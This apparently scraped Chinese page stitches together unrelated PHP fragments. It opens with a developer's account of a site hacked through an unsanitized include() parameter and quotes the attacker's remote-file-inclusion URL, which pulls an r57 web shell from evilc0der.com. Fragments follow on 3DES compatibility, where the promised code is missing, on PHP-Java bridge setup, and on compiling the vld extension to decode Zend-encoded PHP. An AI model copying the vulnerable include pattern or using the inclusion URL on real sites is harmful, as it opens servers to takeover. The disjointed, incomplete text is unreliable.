网站是四年前刚学PHP的时候帮朋友弄的,有些参数没有处理好,造成让人挂马。
php内有一段是这样的,目的是动态加载一个静态页
$type.=".htm";
include ($type);
$type是通过url传过来的值,如:showhtml.php?type=index
因为虚拟主机的是激活的,所以黑客用了这个地址:/showhtml.php?type=http://evilc0der.com/r57.txt??
写了一个java版3des加密程序,可与php兼容,代码如下:
写了一个PHP版的3DES加解密类,可与java的3DES(DESede)加密方式兼容。
环境: 服务器是64位的。 centos linux 5.0 (x86_64) 系统自带apache 2.2及php5.x
所需安装包(latest version): jdk-1_5_0_12-linux-amd64.bin (http://java.sun.com/j2se/1.5.0/download.jsp) php-java-bridge_5.0.0.tar.gz (http://php-java-bridge.sourceforge.net/)
zend解密方法
解密ZEND加密后的PHP
先下载http://pecl.php.net/get/vld-0.8.0.tgz
执行
#tar -xzf vld-0.8.0.tgz //解压
#mv vld-0.8.0 vld //重命名
#cd -R vld ../php-4.3.8/ext //拷贝vld目录到php的解压目录下的ext中
#cd php-4.3.8
#rm configure //删除configure,因为下面的buildconf会重新生成新的configure
#./buildconf //如果出现错误,就按提示加上相应的参数.
#./configure –with-mysql –with-apxs2=/usr/www/bin/apxs –enable-vld 重新检查php
#make 编译
#make install 安装
